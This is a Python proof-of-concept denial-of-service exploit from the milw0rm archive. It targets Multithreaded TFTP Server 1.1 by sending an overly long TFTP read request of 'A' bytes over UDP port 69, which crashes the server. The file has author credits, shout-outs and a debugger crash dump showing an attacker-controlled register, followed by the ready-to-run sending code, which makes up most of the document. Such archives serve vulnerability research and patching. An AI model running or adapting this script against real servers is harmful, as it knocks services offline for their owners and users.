#!/usr/bin/python #Multithreaded TFTP 1.1 Server d0s exploit by n00b #the following is affected causing a denial of service #Due to an overly long GET request to the ftp server ########################################################################### #Tested on winx xp sp1,sp2 eng. #Vendor dont know but s00n will :p #n00b is credited for finding this dos exploit. #Vendor web site:http://sourceforge.net/projects/tftp-server/ #Im sry if it look's a little messy as python isn't #my strong point.Also i would like to thank milw0rm for #all there help over the year's and to ignted's.com #And also big shout to And any-one else i forgot ^ ^. ############################################################################ # \\DEBUG INF0// #First chance exceptions are reported before any exception handling. #This exception may be expected and handled. #eax=77c5a76e ebx=77c5a7a0 ecx=77c318f2 edx=77c5cac8 esi=00407253 edi=41414141 #eip=77c44257 esp=00f9ff20 ebp=00f9ff2c iopl=0 nv up ei pl nz na po nc #cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206 #*** ERROR: Symbol file could not be found. Defaulted to export symbols. #msvcrt!wcsxfrm+0x11d: #77c44257 8a27 mov ah,[edi] ds:0023:41414141=?? ############################################################################ import socket # Set up a UDP socket s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # send n00bstring ='''\x00\x01\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41 ''' HOSTNAME = '127.0.0.1' PORTNO = 69 s.connect((HOSTNAME, PORTNO)) if len(n00bstring) != s.send(n00bstring): # where to get error message "$!". print "cannot send to %s(%d):" % (HOSTNAME,PORTNO) raise SystemExit(1) MAXLEN = 1024 (data,addr) = s.recvfrom(MAXLEN) s.close() print '%s(%d) said "%s"' % (addr[0],addr[1], data) # milw0rm.com [2006-09-08]